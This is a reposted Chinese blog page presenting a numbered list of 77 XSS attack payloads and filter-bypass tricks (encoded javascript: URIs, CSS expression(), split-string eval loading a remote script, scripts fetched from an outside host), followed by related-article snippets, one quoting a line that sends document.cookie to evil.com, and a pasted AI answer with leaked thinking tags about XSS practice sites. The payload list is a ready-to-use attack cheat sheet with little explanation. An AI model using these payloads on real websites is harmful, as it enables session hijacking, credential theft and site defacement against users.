xss攻击汇总--转

最新推荐文章于 2025-03-31 23:59:21 发布
原创 最新推荐文章于 2025-03-31 23:59:21 发布 · 816 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

(1)普通的XSS JavaScript注入
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
(2)IMG标签XSS使用JavaScript命令
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
(3)IMG标签无分号无引号
<IMG SRC=javascript:alert('XSS')>
(4)IMG标签大小写不敏感
<IMG SRC=JaVaScRiPt:alert('XSS')>
(5)HTML编码(必须有分号)
<IMG SRC=javascript:alert("XSS")>
(6)修正缺陷IMG标签
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
(7)formCharCode标签(计算器)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
(8)UTF-8的Unicode编码(计算器)
<IMG SRC=jav..省略..S')>
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
<IMG SRC=jav..省略..S')>
(10)十六进制编码也是没有分号(计算器)
<IMG SRC=&#x6A&#x61&#x76&#x61..省略..&#x58&#x53&#x53&#x27&#x29>
(11)嵌入式标签,将Javascript分开
<IMG SRC="jav ascript:alert('XSS');">
(12)嵌入式编码标签,将Javascript分开
<IMG SRC="jav ascript:alert('XSS');">
(13)嵌入式换行符
<IMG SRC="jav ascript:alert('XSS');">
(14)嵌入式回车
<IMG SRC="jav ascript:alert('XSS');">
(15)嵌入式多行注入JavaScript,这是XSS极端的例子
<IMG SRC="javascript:alert('XSS')">
(16)解决限制字符(要求同页面)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval_r(z)</script>
(17)空字符12-7-1T00LS - Powered by Discuz! Board
https://www.t00ls.net/viewthread.php?action=printable&tid=15267 2/6
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out
(19)Spaces和meta前的IMG标签
<IMG SRC=" javascript:alert('XSS');">
(20)Non-alpha-non-digit XSS
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>
(21)Non-alpha-non-digit XSS to 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
(22)Non-alpha-non-digit XSS to 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>
(23)双开括号
<<SCRIPT>alert("XSS");//<</SCRIPT>
(24)无结束脚本标记(仅火狐等浏览器)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
(25)无结束脚本标记2
<SCRIPT SRC=//3w.org/XSS/xss.js>
(26)半开的HTML/JavaScript XSS
<IMG SRC="javascript:alert('XSS')"
(27)双开角括号
<iframe src=http://3w.org/XSS.html <
(28)无单引号 双引号 分号
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>
(29)换码过滤的JavaScript
\";alert('XSS');//
(30)结束Title标签
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
(31)Input Image
<INPUT SRC="javascript:alert('XSS');">
(32)BODY Image
<BODY BACKGROUND="javascript:alert('XSS')">
(33)BODY标签
<BODY('XSS')>
(34)IMG Dynsrc
<IMG DYNSRC="javascript:alert('XSS')">
(35)IMG Lowsrc
<IMG LOWSRC="javascript:alert('XSS')">
(36)BGSOUND
<BGSOUND SRC="javascript:alert('XSS');">
(37)STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
(38)远程样式表
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">
(39)List-style-image(列表式)
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS
(40)IMG VBscript
<IMG SRC='vbscript:msgbox("XSS")'></STYLE><UL><LI>XSS
(41)META链接url
<META HTTP-EQUIV="refresh" CONTENT="0;
URL=http://;URL=javascript:alert('XSS');">
(42)Iframe
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
(43)Frame
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>12-7-1 T00LS - Powered by Discuz! Board
https://www.2cto.com /viewthread.php?action=printable&tid=15267 3/6
(44)Table
<TABLE BACKGROUND="javascript:alert('XSS')">
(45)TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">
(46)DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-
8&13&12288&65279)
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
(48)DIV expression
<DIV STYLE="width: expression_r(alert('XSS'));">
(49)STYLE属性分拆表达
<IMG STYLE="xss:expression_r(alert('XSS'))">
(50)匿名STYLE(组成:开角号和一个字母开头)
<XSS STYLE="xss:expression_r(alert('XSS'))">
(51)STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A
CLASS=XSS></A>
(52)IMG STYLE方式
exppression(alert("XSS"))'>
(53)STYLE background
<STYLE><STYLE
type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
(54)BASE
<BASE HREF="javascript:alert('XSS');//">
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
<EMBED SRC="http://3w.org/XSS/xss.swf" ></EMBED>
(56)在flash中使用ActionScrpt可以混进你XSS的代码
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval_r(a+b+c+d);
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
<HTML xmlns:xss>
<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
<SCRIPT SRC=""></SCRIPT>
(59)IMG嵌入式命令,可执行任意命令
<IMG SRC="http://www.XXX.com/a.php?a=b">
(60)IMG嵌入式命令(a.jpg在同服务器)
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
(61)绕符号过滤
<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>
(62)
<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>
(63)
<SCRIPT a=">" " SRC="http://3w.org/xss.js"></SCRIPT>
(64)
<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>
(65)
<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>
(66)12-7-1 T00LS - Powered by Discuz! Board
https://www.t00ls.net/viewthread.php?action=printable&tid=15267 4/6
<SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>
(67)
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js">
</SCRIPT>
(68)URL绕行
<A HREF="http://127.0.0.1/">XSS</A>
(69)URL编码
<A HREF="http://3w.org">XSS</A>
(70)IP十进制
<A HREF="http://3232235521">XSS</A>
(71)IP十六进制
<A HREF="http://0xc0.0xa8.0x00.0x01">XSS</A>
(72)IP八进制
<A HREF="http://0300.0250.0000.0001">XSS</A>
(73)混合编码
<A HREF="h
tt p://6 6.000146.0x7.147/"">XSS</A>
(74)节省[http:]
<A HREF="//www.google.com/">XSS</A>
(75)节省[www]
<A HREF="http://google.com/">XSS</A>
(76)绝对点绝对DNS
<A HREF="http://www.google.com./">XSS</A>
(77)javascript链接
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>
原文地址:http://fuzzexp.org/u/0day/?p=14

davidwang456
关注
​安全测试之XSS跨站脚本攻击实例解析​
1、测试博主技术知识分享 2、pos行业知识技术分享 3、java后端技术知识分享 4、嵌入式技术知识分享 5、运维部署相关知识分享
07-04 601
跨站攻击,即Cross Site Script Execution(通常简写为XSS,因为CSS与层叠样式表同名,故改为XSS) 是指攻击者利用网站程序对用户输入过滤不足,输入可以显示在页面上对其他用户造成影响的HTML代码,从而盗取用户资料、利用用户身份进行某种动作或者对访问者进行病毒侵害的一种攻击方式。很多人对于XSS的利用大多停留在弹框框的程度,一些厂商对XSS也是不以为然,都认为安全级别很低,甚至忽略不计。本文旨在讲述关于跨站攻击的利用方式,并结合实例进行分析。
XSS攻击绕过方法以及绕过waf方法语句大全 XSS攻击语句这一篇足够
热门推荐
盾悟
12-31 1万+
1. 使用HTML实体编码 2. 大小写混合 3. 利用JavaScript事件 4. 利用URL编码 5. 使用不完整的HTML标签 6. 利用编码绕过 7. 使用不寻常的标签 8. 利用CDATA 9. 利用注释 10. 使用文档对象模型(DOM) 11. 利用HTML5功能 12. 使用特殊字符 13. 利用外部脚本 14. 使用IFrame 15. 利用CSS注入 16. 使用数据URI 17. 利用SVG 18. 使用Base64编码 19. 利用JavaScr
XSS跨站脚本攻击
weixin_30505225的博客
04-26 1369
1、简介 跨站脚本(cross site script)为了避免与样式css混淆,所以简称为XSSXSS是一种经常出现在web应用中的计算机安全漏洞,也是web中最主流的攻击方式。那么什么是XSS呢? XSS是指恶意攻击者利用网站没有对用户提交数据进行义处理或者过滤不足的缺点,进而添加一些代码,嵌入到web页面中去。使别的用户访问都会执行相应的嵌入代码。 从而盗取用户资料、利用用户身...
Web安全测试之XSS实例讲解
09-01
本文主要介绍Web安全测试之XSS,这里详细整理了测试XSS的资料,并附示例代码和详细讲解,有需要的小伙伴可以参考下
xss攻击汇总
continue my dream
09-04 3067
(1)普通的XSS JavaScript注入 (2)IMG标签XSS使用JavaScript命令 (3)IMG标签无分号无引号 (4)IMG标签大小写不敏感 (5)HTML编码(必须有分号) (6)修正缺陷IMG标签 alert("XSS")"> (7)formCharCode标签(计算器) (8)UTF-8的Unicode编码(计算器) (9)7位的
XSS 攻击(详细)
FFNCL的博客
03-31 6188
XSS,即跨站脚本攻击,是 Web 安全领域中十分常见的漏洞类型。攻击者通过在 Web 页面中注入恶意脚本,当用户浏览该页面时,恶意脚本便会在用户的浏览器中执行。借助这种攻击方式,攻击者能够窃取用户的敏感信息,如登录凭证、个人隐私数据等;劫持用户会话,以用户身份进行各种操作;甚至篡改网站内容,严重损害网站的声誉和用户信任。举例来说,某电商网站若存在 XSS 漏洞,攻击者可通过注入恶意脚本,窃取用户的账号密码,进而盗刷用户的账户资金,给用户带来直接的经济损失。
精选资源
XSS攻击常识及常见的XSS攻击脚本汇总.pdf
12-26
XSS攻击常识及常见的XSS攻击脚本汇总
网络安全求职面试题库与实战经验分享项目-涵盖Web安全基础漏洞SQL注入XSS越权XXE-SSRF-CSRF-进阶漏洞提权绕过CDN免杀中间件云安全Java安全JNDI-Fastj.zip
最新发布
09-03
在Web安全基础部分,项目详细介绍了SQL注入的原理、检测和防御,XSS攻击的不同类型和防护策略,越权访问的场景分析和预防措施,以及XXE和SSRF攻击向量的识别与防护。对于CSRF攻击,项目不仅分析了其攻击原理,还提供...
防范XSS攻击程序
07-29
对用户输入的所有数据进行拦截,检测是否含有XSS攻击关键字,如果存在XSS攻击关键字,对一些特殊字符,如:“<”、“>”、“&”等进行义。 实现方案 自定义一个Filter拦截器,使用 Filter来过滤浏览器发出的...
安全修复之Web——HTTP X-XSS-Protection缺失
CN華少的博客
04-29 1696
安全修复之Web——HTTP X-XSS-Protection缺失 背景 日常我们开发时,会遇到各种各样的奇奇怪怪的问题(踩坑o(╯□╰)o),这个常见问题系列就是我日常遇到的一些问题的记录文章系列,这里整理汇总后分享给大家,让其还在深坑中的小伙伴有绳索能爬出来。 同时在这里也欢迎大家把自己遇到的问题留言或私信给我,我看看其能否给大家解决。 开发环境 系统:windows10 语言:Golang...
什么是XSS攻击?常见攻击方法汇总
a38417的博客
03-15 1704
XSS全称是Cross Site Scripting即跨站脚本,当目标网站目标用户浏览器渲染HTML文档的过程中,出现了不被预期的脚本指令并执行时,XSS就发生了。这里我们主要注意四点:1、目标网站目标用户;2、浏览器;3、不被预期;4、脚本。
xss测试用例
liu_xp_mother的博客
07-11 7670
1. alert(1); 2.alert('xss'); 3. 4.location.href="http://www.evil.com/cookies.php?cookie="+escape(document.cookie)" 5.ipt>alert('xss');ipt> 6. 7.@im\port'\ja\vasc\ript:alert(\"xss\")'; 8.alert(\
xss攻击原理与解决方法
茂盛博客
08-01 1033
常见的XSS攻击代码
weixin_30621711的博客
11-09 768
第一类: <tag on*=*/> 在html标签中触发事件 Example: 1.加载完毕自动触发事件 <body onload="alert('xss')"></body> 2.使html某元素撑满整个页面 <p onclick="alert('1')" style="postion:fixed;width:100%;hei...
XSS漏洞常见攻击方式
天天学安全专属博客
10-08 4429
1.危害 都是通过js脚本来实现的浏览器内核版本也会影响到js代码的实现 1、钓鱼欺骗 2、网站挂马 3、身份盗用 4、盗取网站用户信息 5、垃圾信息发送 6、劫持用户Web行为 7、XSS蠕虫 2.原理 XSS 属于被动式的攻击攻击者先构造一个跨站页面,利用script、、等各种方式使得用户浏览这个页面时,触发对被攻击站点的http 请求。此时,如果被攻击者如果已经在被攻击站点登录,就会持有该站点cookie。这样该站点会认为被攻击者发起了一个http 请求。而实际
xss测试用例小结
weixin_34343000的博客
02-04 238
&lt;script&gt;alert("跨站")&lt;/script&gt; (最常用) &lt;img scr=javascript:alert("跨站")&gt;&lt;/img&gt; &lt;img scr="javascript: alert(/跨站/)&gt;&lt;/img&gt; &lt;img scr="javas??
安全测试之xss攻击通用测试用例
测试开发
04-12 1703
安全测试,测xss攻击,一个通用case测出一类问题。测试开发同学可以关注一下
xss-game appspot
03-15
<think>好的,我现在需要处理用户关于寻找与xss-game相关的应用程序或站点的请求。用户特别提到了“xss-game appspot site:appspot.com”,这提示他们可能在寻找托管在Google App Engine(appspot.com)上的XSS游戏或练习平台。 首先,我应该回顾已有的引用内容,看看是否有相关的资源被提及。引用[2]提到了AwesomeXSSXSSChallengeWiki和一些XSS挑战资源,但没有明确提到appspot.com的网站。引用[3]和[4]涉及XSS实例和payload,但同样没有直接相关的信息。 接下来,我需要思考用户可能需要的资源类型。XSS游戏通常用于教学或练习跨站脚本攻击,帮助用户了解如何发现和利用XSS漏洞。Google App Engine(GAE)常被用来托管这类应用,比如著名的“XSS-Game”就曾经在appspot.com上运行。 不过,根据我的知识库,Google的XSS游戏可能已经下线,但用户可能仍然可以通过其他途径找到类似的平台。例如,可能需要推荐替代的站点,如XSS Challenges或类似OverTheWire的关卡式学习平台。此外,引用中提到的XSSChallengeWiki(引用[2])可能包含相关挑战列表,用户可以参考。 另外,用户可能对实际演练感兴趣,所以需要建议一些活跃的练习站点,即使它们不在appspot.com上。同时,考虑到安全,提醒用户仅在合法授权的环境中进行测试。 最后,生成相关问题时要围绕XSS练习资源、替代平台、学习方法以及合法性问题展开,确保覆盖用户可能的后续疑问。</think>根据您的需求,以下是关于寻找XSS-Game相关资源及站点的解答: ### 一、XSS-Game资源整理 1. **Google XSS-Game(已下线但可存档访问)** - 原官方地址为`xss-game.appspot.com`,是Google推出的XSS漏洞实战练习平台,包含6个渐进式关卡[^2]。 - 可通过网络存档(如Web Archive)尝试访问历史版本,部分第三方镜像站可能仍保留内容。 2. **替代性XSS挑战平台推荐** - **XSS Challenges (http://xss-quiz.int21h.jp/)** 提供多难度等级的XSS漏洞实战题目,需绕过过滤规则注入脚本。 - **PentesterLab XSS Exercises** 包含基于真实场景的XSS练习,覆盖反射型、存储型等漏洞类型。 - **OWASP Juice Shop** 综合型Web安全练习平台,包含XSS在内的多种漏洞挑战。 3. **社区推荐资源** - **XSSChallengeWiki(引用自)** 汇总全球XSS挑战赛题及解法,含部分App Engine项目。 - **OverTheWire(引用自[^1])** 提供类似CTF的渐进式安全挑战,涵盖基础Web漏洞。 --- ### 二、操作建议 1. 使用搜索指令组合: ```bash site:appspot.com intitle:"XSS Game" site:github.com "xss-game" appengine ``` 可发现第三方开发的类似项目或开源代码库。 2. 本地部署方案: - 从GitHub克隆开源XSS游戏项目(如`google/xss-game`) - 使用Docker或本地服务器搭建练习环境,避免依赖外部站点。 --- ### 三、注意事项 - 法律合规性:仅在授权环境测试,避免对未授权站点进行漏洞探测[^1]。 - 技术准备:学习XSS绕过技巧,如编码混淆、DOM型漏洞利用(参考引用[^4]中的payload示例)。 ---
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值